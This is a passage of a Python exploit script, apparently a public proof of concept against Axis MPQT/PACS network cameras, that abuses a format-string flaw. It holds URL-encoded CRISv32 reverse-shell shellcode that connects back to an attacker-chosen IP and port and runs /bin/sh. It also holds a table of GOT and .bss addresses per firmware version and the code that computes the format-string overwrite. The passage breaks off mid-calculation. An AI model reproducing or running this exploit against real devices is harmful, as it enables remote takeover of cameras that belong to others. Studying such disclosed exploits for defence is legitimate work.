CRISv32 = string.join([\r\n #close(0)\r\n \"%7a%86\" # clear.d r10 \r\n \"%5f%9c%06%00\" # movu.w 0x6,r9\r\n \"%3d%e9\" # break 13\r\n #close(1)\r\n \"%41%a2\" # moveq 1,r10\r\n \"%5f%9c%06%00\" # movu.w 0x6,r9\r\n \"%3d%e9\" # break 13\r\n #close(2)\r\n \"%42%a2\" # moveq 2,r10\r\n \"%5f%9c%06%00\" # movu.w 0x6,r9\r\n \"%3d%e9\" # break 13\r\n #\r\n \"%10%e1\" # addoq 16,sp,acr\r\n \"%42%92\" # moveq 2,r9\r\n \"%df%9b\" # move.w r9,[acr]\r\n \"%10%e1\" # addoq 16,sp,acr\r\n \"%02%f2\" # addq 2,acr\r\n #PORT\r\n \"%5f%9ePP1PP0\" # move.w 0xPP1PP0,r9 #\r\n \"%df%9b\" # move.w r9,[acr]\r\n \"%10%e1\" # addoq 16,sp,acr\r\n \"%6f%96\" # move.d acr,r9\r\n \"%04%92\" # addq 4,r9\r\n #IP\r\n \"%6f%feIP1IP2IP3IP4\" # move.d IP4IP3IP2IP1,acr\r\n \"%e9%fb\" # move.d acr,[r9]\r\n #\r\n #socket()\r\n \"%42%a2\" # moveq 2,r10\r\n \"%41%b2\" # moveq 1,r11\r\n \"%7c%86\" # clear.d r12\r\n \"%6e%96\" # move.d $sp,$r9\r\n \"%e9%af\" # move.d $r10,[$r9+]\r\n \"%e9%bf\" # move.d $r11,[$r9+]\r\n \"%e9%cf\" # move.d $r12,[$r9+]\r\n \"%41%a2\" # moveq 1,$r10\r\n \"%6e%b6\" # move.d $sp,$r11\r\n \"%5f%9c%66%00\" # movu.w 0x66,$r9\r\n \"%3d%e9\" # break 13\r\n #\r\n \"%6a%96\" # move.d $r10,$r9\r\n \"%0c%e1\" # addoq 12,$sp,$acr\r\n \"%ef%9b\" # move.d $r9,[$acr]\r\n \"%0c%e1\" # addoq 12,$sp,$acr\r\n \"%6e%96\" # move.d $sp,$r9\r\n \"%10%92\" # addq 16,$r9\r\n \"%6f%aa\" # move.d [$acr],$r10\r\n \"%69%b6\" # move.d $r9,$r11\r\n \"%50%c2\" # moveq 16,$r12\r\n #\r\n # connect()\r\n \"%6e%96\" # move.d $sp,$r9\r\n \"%e9%af\" # move.d $r10,[$r9+]\r\n \"%e9%bf\" # move.d $r11,[$r9+]\r\n \"%e9%cf\" # move.d $r12,[$r9+]\r\n \"%43%a2\" # moveq 3,$r10\r\n \"%6e%b6\" # move.d $sp,$r11\r\n \"%5f%9c%66%00\" # movu.w 0x66,$r9 \r\n \"%3d%e9\" # break 13\r\n # dup(0) already in socket\r\n #dup(1)\r\n \"%6f%aa\" # move.d [$acr],$r10\r\n \"%41%b2\" # moveq 1,$r11\r\n \"%5f%9c%3f%00\" # movu.w 0x3f,$r9\r\n \"%3d%e9\" # break 13\r\n #\r\n #dup(2)\r\n \"%6f%aa\" # move.d [$acr],$r10\r\n \"%42%b2\" # moveq 2,$r11\r\n \"%5f%9c%3f%00\" # movu.w 0x3f,$r9\r\n \"%3d%e9\" # break 13\r\n #\r\n #execve(\"/bin/sh\",NULL,NULL)\r\n \"%90%e2\" # subq 16,$sp\r\n \"%6e%96\" # move.d $sp,$r9\r\n \"%6e%a6\" # move.d $sp,$10\r\n \"%6f%0e%2f%2f%62%69\" # move.d 69622f2f,$r0\r\n \"%e9%0b\" # move.d $r0,[$r9]\r\n \"%04%92\" # addq 4,$r9\r\n \"%6f%0e%6e%2f%73%68\" # move.d 68732f6e,$r0\r\n \"%e9%0b\" # move.d $r0,[$r9]\r\n \"%04%92\" # addq 4,$r9\r\n \"%79%8a\" # clear.d [$r9]\r\n \"%04%92\" # addq 4,$r9\r\n \"%79%8a\" # clear.d [$r9]\r\n \"%04%92\" # addq 4,$r9\r\n \"%e9%ab\" # move.d $r10,[$r9]\r\n \"%04%92\" # addq 4,$r9\r\n \"%79%8a\" # clear.d [$r9]\r\n \"%10%e2\" # addq 16,$sp\r\n \"%6e%f6\" # move.d $sp,$acr\r\n \"%6e%96\" # move.d $sp,$r9\r\n \"%6e%b6\" # move.d $sp,$r11\r\n \"%7c%86\" # clear.d $r12\r\n \"%4b%92\" # moveq 11,$r9\r\n \"%3d%e9\" # break 13\r\n ], '') \r\n \r\n \r\n if self.target == 'MIPSel':\r\n return MIPSel\r\n elif self.target == 'ARMel':\r\n return ARMel\r\n elif self.target == 'CRISv32':\r\n return CRISv32\r\n elif self.target == 'NCSH1':\r\n return NCSH\r\n elif self.target == 'NCSH2':\r\n return NCSH\r\n else:\r\n print \"[!] Unknown shellcode! (%s)\" % str(self.target)\r\n sys.exit(1)\r\n \r\n \r\nclass FMSdb:\r\n \r\n def __init__(self,targetIP,verbose):\r\n self.targetIP = targetIP\r\n self.verbose = verbose\r\n \r\n def FMSkey(self,target):\r\n self.target = target\r\n \r\n target_db = {\r\n \r\n#-----------------------------------------------------------------------\r\n# All pointing from free() GOT to shellcode on .bss (Except ARM with NCSH)\r\n#-----------------------------------------------------------------------\r\n \r\n#\r\n# Using POP format string, AKA 'Old Style'\r\n#\r\n # MPQT\r\n 'MIPS-5.85.x': [\r\n 0x41f370, # Adjust to GOT free() address\r\n 0x420900, # .bss shellcode address\r\n 2, # 1st POP's\r\n 2, # 2nd POP's\r\n 'axi', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n # MPQT\r\n 'MIPS-5.40.3': [\r\n 0x41e41c, # Adjust to GOT free() address\r\n 0x4208cc, # .bss shellcode address\r\n 7, # 1st POP's\r\n 11, # 2nd POP's\r\n 'ax', # Aligns injected code\r\n 450, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n # MPQT\r\n 'MIPS-5.4x': [ \r\n 0x41e4cc, # Adjust to GOT free() address\r\n 0x42097c, # .bss shellcode address\r\n 7, # 1st POP's\r\n 11, # 2nd POP's\r\n 'ax', # Aligns injected code\r\n 450, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n # MPQT\r\n 'MIPS-5.5x': [\r\n 0x41d11c, # Adjust to GOT free() address\r\n 0x41f728, # .bss shellcode address\r\n 5, # 1st POP's\r\n 15, # 2nd POP's\r\n 'axis', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n # MPQT\r\n 'MIPS-5.55x': [ \r\n 0x41d11c, # Adjust to GOT free() address\r\n 0x41f728, # .bss shellcode address\r\n 11, # 1st POP's\r\n 9, # 2nd POP's\r\n 'axis', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n # Shared with MPQT and PACS\r\n 'MIPS-5.6x': [ \r\n 0x41d048, # Adjust to GOT free() address\r\n 0x41f728, # .bss shellcode address\r\n 5, # 1st POP's\r\n 15, # 2nd POP's\r\n 'axis', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n \r\n ],\r\n \r\n # MPQT\r\n 'MIPS-5.7x': [ \r\n 0x41d04c, # Adjust to GOT free() address\r\n 0x41f718, # .bss shellcode address\r\n 2, # 1st POP's\r\n 14, # 2nd POP's\r\n 'axis', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n # MPQT\r\n 'MIPS-5.75x': [\r\n 0x41c498, # Adjust to GOT free() address\r\n 0x41daf0, # .bss shellcode address\r\n 3, # 1st POP's\r\n 13, # 2nd POP's\r\n 'axi', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n # Shared with MPQT and PACS\r\n 'MIPS-5.8x': [\r\n 0x41d0c0, # Adjust to GOT free() address\r\n 0x41e740, # .bss shellcode address\r\n 3, # 1st POP's\r\n 13, # 2nd POP's\r\n 'axi', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n # MPQT\r\n 'MIPS-5.9x': [ \r\n 0x41d0c0, # Adjust to GOT free() address\r\n 0x41e750, # .bss shellcode address\r\n 3, # 1st POP's\r\n 13, # 2nd POP's\r\n 'axi', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n # MPQT\r\n 'MIPS-6.1x': [\r\n 0x41c480, # Adjust to GOT free() address\r\n 0x41dac0, # .bss shellcode address\r\n 3, # 1st POP's\r\n 13, # 2nd POP's\r\n 'axi', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n # MPQT\r\n 'MIPS-6.2x': [\r\n 0x41e578, # Adjust to GOT free() address\r\n 0x41fae0, # .bss shellcode address\r\n 2, # 1st POP's\r\n 2, # 2nd POP's\r\n 'axi', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n # MPQT\r\n 'MIPS-6.20x': [\r\n 0x41d0c4, # Adjust to GOT free() address\r\n 0x41e700, # .bss shellcode address\r\n 3, # 1st POP's\r\n 13, # 2nd POP's\r\n 'axi', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n # PACS\r\n 'MIPS-1.3x': [\r\n 0x41e4cc, # Adjust to GOT free() address\r\n 0x420a78, # .bss shellcode address\r\n 7, # 1st POP's\r\n 11, # 2nd POP's\r\n 'axis', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n # PACS\r\n 'MIPS-1.1x': [\r\n 0x41e268, # Adjust to GOT free() address\r\n 0x420818, # .bss shellcode address\r\n 7, # 1st POP's\r\n 11, # 2nd POP's\r\n 'axis', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n#\r\n# Tested with execstack to set executable stack flag bit on bin's and lib's\r\n#\r\n# These two 'Old Style' are not used in the exploit, but kept here as reference as they has been confirmed working.\r\n#\r\n \r\n # ARMel with bin/libs executable stack flag set with 'execstack'\r\n # MPQT\r\n 'ARM-5.50x': [ # \r\n 0x1c1b4, # Adjust to GOT free() address\r\n 0x1e7c8, # .bss shellcode address\r\n 93, # 1st POP's\r\n 1, # 2nd POP's\r\n 'axis', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'ARMel' # Shellcode type (ARMel)\r\n ],\r\n \r\n # ARMel with bin/libs executable stack flag set with 'execstack'\r\n # MPQT\r\n 'ARM-5.55x': [ # \r\n 0x1c15c, # Adjust to GOT free() address\r\n 0x1e834, # .bss shellcode address\r\n 59, # 1st POP's\r\n 80, # 2nd POP's\r\n 'axis', # Aligns injected code\r\n 800, # How big buffer before shellcode\r\n 'ARMel' # Shellcode type (ARMel)\r\n ],\r\n \r\n#\r\n# Using direct parameter access format string, AKA 'New Style'\r\n#\r\n # MPQT\r\n 'ARM-NCSH-5.20x': [ # AXIS P1311 5.20 (id=root)\r\n 0x1c1b4, # Adjust to GOT free() address\r\n 0x10178, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\"\r\n 61, # 1st POP's\r\n 115, # 2nd POP's\r\n 143, # 3rd POP's\r\n 118, # 4th POP's\r\n 'NCSH2' # Shellcode type (Netcat Shell)\r\n ],\r\n \r\n # MPQT\r\n 'ARM-NCSH-5.2x': [ # \r\n 0x1c1b4, # Adjust to GOT free() address\r\n 0x1013c, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\"\r\n 61, # 1st POP's\r\n 115, # 2nd POP's\r\n 143, # 3rd POP's\r\n 118, # 4th POP's\r\n 'NCSH2' # Shellcode type (Netcat Shell)\r\n ],\r\n \r\n # MPQT\r\n 'ARM-NCSH-5.4x': [ # \r\n 0x1c1b4, # Adjust to GOT free() address\r\n 0x101fc, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\"\r\n 61, # 1st POP's\r\n 115, # 2nd POP's\r\n 143, # 3rd POP's\r\n 118, # 4th POP's\r\n 'NCSH2' # Shellcode type (Netcat Shell)\r\n ],\r\n#\r\n# Using POP format string, AKA 'Old Style'\r\n#\r\n \r\n # MPQT\r\n 'ARM-NCSH-5.5x': [ # \r\n 0x1c15c, # Adjust to GOT free() address\r\n 0xfdcc, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\"\r\n 97, # 1st POP's\r\n 0, # 2nd POP's\r\n 41, # 3rd POP's\r\n 0, # 4th POP's\r\n 'NCSH1' # Shellcode type (Netcat Shell)\r\n ],\r\n \r\n # MPQT\r\n 'ARM-NCSH-5.6x': [ # \r\n 0x1c15c, # Adjust to GOT free() address\r\n 0xfcec, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\"\r\n 97, # 1st POP's\r\n 0, # 2nd POP's\r\n 41, # 3rd POP's\r\n 0, # 4th POP's\r\n 'NCSH1' # Shellcode type (Netcat Shell)\r\n ],\r\n \r\n # MPQT\r\n 'ARM-NCSH-5.7x': [ # \r\n 0x1c1c0, # Adjust to GOT free() address\r\n 0xf800, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\"\r\n 132, # 1st POP's\r\n 0, # 2nd POP's\r\n 34, # 3rd POP's\r\n 0, # 4th POP's\r\n 'NCSH1' # Shellcode type (Netcat Shell)\r\n ],\r\n \r\n # Will go in endless loop after exit of nc shell... DoS sux\r\n # MPQT\r\n 'ARM-NCSH-5.8x': [ # \r\n 0x1b39c, # Adjust to GOT free() address\r\n 0xf8c0, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\"\r\n 98, # 1st POP's\r\n 0, # 2nd POP's\r\n 34, # 3rd POP's\r\n 1, # 4th POP's\r\n 'NCSH1' # Shellcode type (Netcat Shell)\r\n ],\r\n \r\n # MPQT\r\n 'ARM-NCSH-6.1x': [ # \r\n 0x1d2a4, # Adjust to GOT free() address\r\n# 0xecc4, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\"\r\n 0xecc8, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\"\r\n 106, # 1st POP's\r\n 0, # 2nd POP's\r\n 34, # 3rd POP's\r\n 1, # 4th POP's\r\n 'NCSH1' # Shellcode type (Netcat Shell)\r\n ],\r\n#\r\n# Using POP format string, AKA 'Old Style'\r\n#\r\n \r\n # MPQT\r\n 'CRISv32-5.5x': [ # \r\n 0x8d148, # Adjust to GOT free() address\r\n 0x8f5a8, # .bss shellcode address\r\n 4, # 1st POP's\r\n 13, # 2nd POP's\r\n 'axis', # Aligns injected code\r\n 470, # How big buffer before shellcode\r\n 'CRISv32' # Shellcode type (Crisv32)\r\n ],\r\n \r\n # MPQT\r\n 'CRISv32-5.4x': [ # \r\n 0x8d0e0, # Adjust to GOT free() address\r\n 0x8f542, # .bss shellcode address\r\n 4, # 1st POP's\r\n 13, # 2nd POP's\r\n 'axis', # Aligns injected code\r\n 470, # How big buffer before shellcode\r\n 'CRISv32' # Shellcode type (Crisv32)\r\n ],\r\n \r\n # MPQT\r\n 'CRISv32-5.2x': [ # \r\n 0x8d0b4, # Adjust to GOT free() address\r\n 0x8f4d6, # .bss shellcode address\r\n 4, # 1st POP's\r\n 13, # 2nd POP's\r\n 'axis', # Aligns injected code\r\n 470, # How big buffer before shellcode\r\n 'CRISv32' # Shellcode type (Crisv32)\r\n ],\r\n \r\n # MPQT\r\n 'CRISv32-5.20.0': [ # \r\n 0x8d0e4, # Adjust to GOT free() address\r\n 0x8f546, # .bss shellcode address\r\n 4, # 1st POP's\r\n 13, # 2nd POP's\r\n 'axis', # Aligns injected code\r\n 470, # How big buffer before shellcode\r\n 'CRISv32' # Shellcode type (Crisv32)\r\n ]\r\n \r\n \r\n }\r\n \r\n if self.target == 0:\r\n return target_db\r\n \r\n if not self.target in target_db:\r\n print \"[!] Unknown FMS key: %s!\" % self.target\r\n sys.exit(1)\r\n \r\n if self.verbose:\r\n print \"[Verbose] Number of availible FMS keys:\",len(target_db)\r\n \r\n return target_db\r\n \r\n \r\n#\r\n# Validate correctness of HOST, IP and PORT\r\n#\r\nclass Validate:\r\n \r\n def __init__(self,verbose):\r\n self.verbose = verbose\r\n \r\n # Check if IP is valid\r\n def CheckIP(self,IP):\r\n self.IP = IP\r\n \r\n ip = self.IP.split('.')\r\n if len(ip) != 4:\r\n return False\r\n for tmp in ip:\r\n if not tmp.isdigit():\r\n return False\r\n i = int(tmp)\r\n if i < 0 or i > 255:\r\n return False\r\n return True\r\n \r\n # Check if PORT is valid\r\n def Port(self,PORT):\r\n self.PORT = PORT\r\n \r\n if int(self.PORT) < 1 or int(self.PORT) > 65535:\r\n return False\r\n else:\r\n return True\r\n \r\n # Check if HOST is valid\r\n def Host(self,HOST):\r\n self.HOST = HOST\r\n \r\n try:\r\n # Check valid IP\r\n socket.inet_aton(self.HOST) # Will generate exeption if we try with FQDN or invalid IP\r\n # Or we check again if it is correct typed IP\r\n if self.CheckIP(self.HOST):\r\n return self.HOST\r\n else:\r\n return False\r\n except socket.error as e:\r\n # Else check valid DNS name, and use the IP address\r\n try:\r\n self.HOST = socket.gethostbyname(self.HOST)\r\n return self.HOST\r\n except socket.error as e:\r\n return False\r\n \r\n \r\n \r\nif __name__ == '__main__':\r\n \r\n#\r\n# Help, info and pre-defined values\r\n# \r\n INFO = '[Axis Communications MPQT/PACS remote exploit 2016 bashis <mcw noemail eu>]'\r\n HTTP = \"http\"\r\n HTTPS = \"https\"\r\n proto = HTTP\r\n verbose = False\r\n noexploit = False\r\n lhost = '192.168.0.1' # Default Local HOST\r\n lport = '31337' # Default Local PORT\r\n rhost = '192.168.0.90' # Default Remote HOST\r\n rport = '80' # Default Remote PORT\r\n # Not needed for the SSI exploit, here for possible future usage.\r\n# creds = 'root:pass'\r\n creds = False\r\n \r\n#\r\n# Try to parse all arguments\r\n#\r\n try:\r\n arg_parser = argparse.ArgumentParser(\r\n# prog=sys.argv[0],\r\n prog='axis-ssid-PoC.py',\r\n description=('[*]' + INFO + '\\n'))\r\n arg_parser.add_argument('--rhost', required=False, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']')\r\n arg_parser.add_argument('--rport', required=False, help='Remote Target HTTP/HTTPS Port [Default: '+ rport +']')\r\n arg_parser.add_argument('--lhost', required=False, help='Connect Back Address (IP/FQDN) [Default: '+ lhost +']')\r\n arg_parser.add_argument('--lport', required=False, help='Connect Back Port [Default: '+ lport + ']')\r\n arg_parser.add_argument('--fms', required=False, help='Manual FMS key')\r\n if creds:\r\n arg_parser.add_argument('--auth', required=False, help='Basic Authentication [Default: '+ creds + ']')\r\n arg_parser.add_argument('--https', required=False, default=False, action='store_true', help='Use HTTPS for remote connection [Default: HTTP]')\r\n arg_parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Verbose mode [Default: False]')\r\n arg_parser.add_argument('--noexploit', required=False, default=False, action='store_true', help='Simple testmode; With --verbose testing all code without exploiting [Default: False]')\r\n arg_parser.add_argument('--dict', required=False, default=False, action='store_true', help='Print FMS keys and stats from dictionary, additional details with --verbose')\r\n args = arg_parser.parse_args()\r\n except Exception as e:\r\n print INFO,\"\\nError: %s\\n\" % str(e)\r\n sys.exit(1)\r\n \r\n # We want at least one argument, so print out help\r\n if len(sys.argv) == 1:\r\n arg_parser.parse_args(['-h'])\r\n \r\n print \"\\n[*]\",INFO\r\n \r\n if args.verbose:\r\n verbose = args.verbose\r\n \r\n # Print out info from dictionary\r\n if args.dict:\r\n target = FMSdb(rhost,verbose).FMSkey(0)\r\n print \"[db] Number of FMS keys:\",len(target)\r\n \r\n # Print out detailed info from dictionary\r\n if verbose:\r\n \r\n print \"[db] Target details of FMS Keys availible for manual xploiting\"\r\n print \"\\n[FMS Key]\\t[GOT Address]\\t[BinSh Address]\\t[POP1]\\t[POP2]\\t[POP3]\\t[POP4]\\t[Shellcode]\"\r\n \r\n for tmp in range(0,len(target)):\r\n Key = sorted(target.keys())[tmp]\r\n temp = re.split('[-]',Key)[0:10]\r\n \r\n if temp[1] == 'NCSH':\r\n print Key,'\\t','0x{:08x}'.format(target[Key][0]),'\\t','0x{:08x}'.format(target[Key][1]),'\\t',target[Key][2],'\\t',target[Key][3],'\\t',target[Key][4],'\\t',target[Key][5],'\\t',target[Key][6]\r\n \r\n print \"\\n[FMS Key]\\t[GOT Address]\\t[BSS Address]\\t[POP1]\\t[POP2]\\t[Align]\\t[Buf]\\t[Shellcode]\"\r\n for tmp in range(0,len(target)):\r\n Key = sorted(target.keys())[tmp]\r\n temp = re.split('[-]',Key)[0:10]\r\n \r\n if temp[1] != 'NCSH':\r\n print Key,'\\t','0x{:08x}'.format(target[Key][0]),'\\t','0x{:08x}'.format(target[Key][1]),'\\t',target[Key][2],'\\t',target[Key][3],'\\t',len(target[Key][4]),'\\t',target[Key][5],'\\t',target[Key][6]\r\n \r\n print \"\\n\"\r\n else:\r\n print \"[db] Target FMS Keys availible for manual xploiting instead of using auto mode:\"\r\n Key = \"\"\r\n for tmp in range(0,len(target)):\r\n Key += sorted(target.keys())[tmp]\r\n Key += ', '\r\n print '\\n',Key,'\\n'\r\n sys.exit(0)\r\n \r\n#\r\n# Check validity, update if needed, of provided options\r\n#\r\n if args.https:\r\n proto = HTTPS\r\n if not args.rport:\r\n rport = '443'\r\n \r\n if creds and args.auth:\r\n creds = args.auth\r\n \r\n if args.noexploit:\r\n noexploit = args.noexploit\r\n \r\n if args.rport:\r\n rport = args.rport\r\n \r\n if args.rhost:\r\n rhost = args.rhost\r\n \r\n if args.lport:\r\n lport = args.lport\r\n \r\n if args.lhost:\r\n lhost = args.lhost\r\n \r\n # Check if LPORT is valid\r\n if not Validate(verbose).Port(lport):\r\n print \"[!] Invalid LPORT - Choose between 1 and 65535\"\r\n sys.exit(1)\r\n \r\n # Check if RPORT is valid\r\n if not Validate(verbose).Port(rport):\r\n print \"[!] Invalid RPORT - Choose between 1 and 65535\"\r\n sys.exit(1)\r\n \r\n # Check if LHOST is valid IP or FQDN, get IP back\r\n lhost = Validate(verbose).Host(lhost)\r\n if not lhost:\r\n print \"[!] Invalid LHOST\"\r\n sys.exit(1)\r\n \r\n # Check if RHOST is valid IP or FQDN, get IP back\r\n rhost = Validate(verbose).Host(rhost)\r\n if not rhost:\r\n print \"[!] Invalid RHOST\"\r\n sys.exit(1)\r\n \r\n \r\n#\r\n# Validation done, start print out stuff to the user\r\n#\r\n if noexploit:\r\n print \"[i] Test mode selected, no exploiting...\"\r\n if args.https:\r\n print \"[i] HTTPS / SSL Mode Selected\"\r\n print \"[i] Remote target IP:\",rhost\r\n print \"[i] Remote target PORT:\",rport\r\n print \"[i] Connect back IP:\",lhost\r\n print \"[i] Connect back PORT:\",lport\r\n \r\n rhost = rhost + ':' + rport\r\n \r\n#\r\n# FMS key is required into this PoC\r\n#\r\n if not args.fms:\r\n print \"[!] FMS key is required!\"\r\n sys.exit(1)\r\n else:\r\n Key = args.fms\r\n print \"[i] Trying with FMS key:\",Key\r\n \r\n#\r\n# Prepare exploiting\r\n#\r\n # Look up the FMS key in dictionary and return pointer for FMS details to use\r\n target = FMSdb(rhost,verbose).FMSkey(Key)\r\n \r\n if target[Key][6] == 'NCSH1':\r\n NCSH1 = target[Key][6]\r\n NCSH2 = \"\"\r\n elif target[Key][6] == 'NCSH2':\r\n NCSH2 = target[Key][6]\r\n NCSH1 = \"\"\r\n else:\r\n NCSH1 = \"\"\r\n NCSH2 = \"\"\r\n \r\n if Key == 'ARM-NCSH-5.8x':\r\n print \"\\nExploit working, but will end up in endless loop after exiting remote NCSH\\nDoS sux, so I'm exiting before that shit....\\n\\n\"\r\n sys.exit(0)\r\n \r\n print \"[i] Preparing shellcode:\",str(target[Key][6])\r\n \r\n # We don't use url encoded shellcode with Netcat shell\r\n # This is for MIPS/CRISv32 and ARM shellcode\r\n if not NCSH1 and not NCSH2:\r\n FMSdata = target[Key][4] # This entry aligns the injected shellcode\r\n \r\n # Building up the url encoded shellcode for sending to the target,\r\n # and replacing LHOST / LPORT in shellcode to choosen values\r\n \r\n # part of first 500 decoded bytes will be overwritten during stage #2, and since\r\n # there is different 'tailing' on the request internally, keep it little more than needed, to be safe.\r\n # Let it be 0x00, just for fun.\r\n FMSdata += '%00' * target[Key][5]\r\n \r\n # Connect back IP to url encoded\r\n ip_hex = '%{:02x} %{:02x} %{:02x} %{:02x}'.format(*map(int, lhost.split('.')))\r\n ip_hex = ip_hex.split()\r\n IP1=ip_hex[0];IP2=ip_hex[1];IP3=ip_hex[2];IP4=ip_hex[3];\r\n \r\n # Let's break apart the hex code of LPORT into two bytes\r\n port_hex = hex(int(lport))[2:]\r\n port_hex = port_hex.zfill(len(port_hex) + len(port_hex) % 2)\r\n port_hex = ' '.join(port_hex[i: i+2] for i in range(0, len(port_hex), 2))\r\n port_hex = port_hex.split()\r\n \r\n if (target[Key][6]) == 'MIPSel':\r\n # Connect back PORT\r\n if len(port_hex) == 1:\r\n PP1 = \"%ff\"\r\n PP0 = '%{:02x}'.format((int(port_hex[0],16)-1))\r\n elif len(port_hex) == 2:\r\n # Little Endian\r\n PP1 = '%{:02x}'.format((int(port_hex[0],16)-1))\r\n PP0 = '%{:02x}'.format(int(port_hex[1],16))\r\n elif (target[Key][6]) == 'ARMel': # Could be combinded with CRISv32\r\n # Connect back PORT\r\n if len(port_hex) == 1:\r\n PP1 = \"%00\"\r\n PP0 = '%{:02x}'.format(int(port_hex[0],16))\r\n elif len(port_hex) == 2:\r\n # Little Endian\r\n PP1 = '%{:02x}'.format(int(port_hex[0],16))\r\n PP0 = '%{:02x}'.format(int(port_hex[1],16))\r\n elif (target[Key][6]) == 'CRISv32':\r\n # Connect back PORT\r\n if len(port_hex) == 1:\r\n PP1 = \"%00\"\r\n PP0 = '%{:02x}'.format(int(port_hex[0],16))\r\n elif len(port_hex) == 2:\r\n # Little Endian\r\n PP1 = '%{:02x}'.format(int(port_hex[0],16))\r\n PP0 = '%{:02x}'.format(int(port_hex[1],16))\r\n else:\r\n print \"[!] Unknown shellcode! (%s)\" % str(target[Key][6])\r\n sys.exit(1)\r\n \r\n # Replace LHOST / LPORT in URL encoded shellcode\r\n shell = shellcode_db(rhost,verbose).sc(target[Key][6])\r\n shell = shell.replace(\"IP1\",IP1)\r\n shell = shell.replace(\"IP2\",IP2)\r\n shell = shell.replace(\"IP3\",IP3)\r\n shell = shell.replace(\"IP4\",IP4)\r\n shell = shell.replace(\"PP0\",PP0)\r\n shell = shell.replace(\"PP1\",PP1)\r\n FMSdata += shell\r\n \r\n#\r\n# Calculate the FMS values to be used\r\n#\r\n # Get pre-defined values\r\n ALREADY_WRITTEN = 40 # Already 'written' in the daemon before our FMS\r\n# POP_SIZE = 8\r\n POP_SIZE = 1\r\n \r\n GOThex = target[Key][0]\r\n BSShex = target[Key][1]\r\n GOTint = int(GOThex)\r\n \r\n # 'One-Write-Where-And-What'\r\n if not NCSH1 and not NCSH2:\r\n \r\n POP1 = target[Key][2]\r\n POP2 = target[Key][3]\r\n \r\n # Calculate for creating the FMS code\r\n ALREADY_WRITTEN = ALREADY_WRITTEN + (POP1 * POP_SIZE)\r\n GOTint = (GOTint - ALREADY_WRITTEN)\r\n \r\n ALREADY_WRITTEN = ALREADY_WRITTEN + (POP2 * POP_SIZE)\r\n \r\n BSSint = int(BSShex)\r\n BSSint = (BSSint - GOTint - ALREADY_WRITTEN)\r\n \r\n# if verbose:\r\n# print \"[Verbose] Calculated GOTint:\",GOTint,\"Calculated BSSint:\",BSSint\r\n \r\n # 'Two-Write-Where-And-What' using \"New Style\"\r\n elif NCSH2:\r\n \r\n POP1 = target[Key][2]\r\n POP2 = target[Key][3]\r\n POP3 = target[Key][4]\r\n POP4 = target[Key][5]\r\n POP2_SIZE = 2\r\n \r\n # We need to count higher than provided address for the jump\r\n BaseAddr = 0x10000 + BSShex\r\n \r\n # Calculate for creating the FMS code\r\n GOTint = (GOTint - ALREADY_WRITTEN)\r\n \r\n ALREADY_WRITTEN = ALREADY_WRITTEN + GOTint\r\n \r\n # Calculate FirstWhat value\r\n FirstWhat = BaseAddr - (ALREADY_WRITTEN)\r\n \r\n ALREADY_WRITTEN = ALREADY_WRITTEN + FirstWhat\r\n \r\n # Calculate SecondWhat value, so it always is 0x20300\r\n SecondWhat = 0x20300 - (ALREADY_WRITTEN + POP2_SIZE)\r\n \r\n shell = shellcode_db(rhost,verbose).sc(target[Key][6])\r\n shell = shell.replace(\"LHOST\",lhost)\r\n shell = shell.replace(\"LPORT\",lport)\r\n \r\n FirstWhat = FirstWhat - len(shell)\r\n \r\n# if verbose:\r\n# print \"[Verbose] Calculated GOTint:\",GOTint,\"Calculated FirstWhat:\",FirstWhat,\"Calculated SecondWhat:\",SecondWhat\r\n \r\n \r\n # 'Two-Write-Where-And-What' using \"Old Style\"\r\n elif NCSH1:\r\n \r\n POP1 = target[Key][2]\r\n POP2 = target[Key][3]\r\n POP3 = target[Key][4]\r\n POP4 = target[Key][5]\r\n POP2_SIZE = 2\r\n \r\n # FirstWhat writes with 4 bytes (Y) (0x0002YYYY)\r\n # SecondWhat writes with 1 byte (Z) (0x00ZZYYYY)\r\n if BSShex > 0x10000:\r\n MSB = 1\r\n else:\r\n MSB = 0\r\n \r\n # We need to count higher than provided address for the jump\r\n BaseAddr = 0x10000 + BSShex\r\n \r\n # Calculate for creating the FMS code\r\n ALREADY_WRITTEN = ALREADY_WRITTEN + (POP1 * POP_SIZE)\r\n \r\n GOTint = (GOTint - ALREADY_WRITTEN)\r\n \r\n ALREADY_WRITTEN = ALREADY_WRITTEN + GOTint + POP2_SIZE + (POP3 * POP_SIZE)\r\n 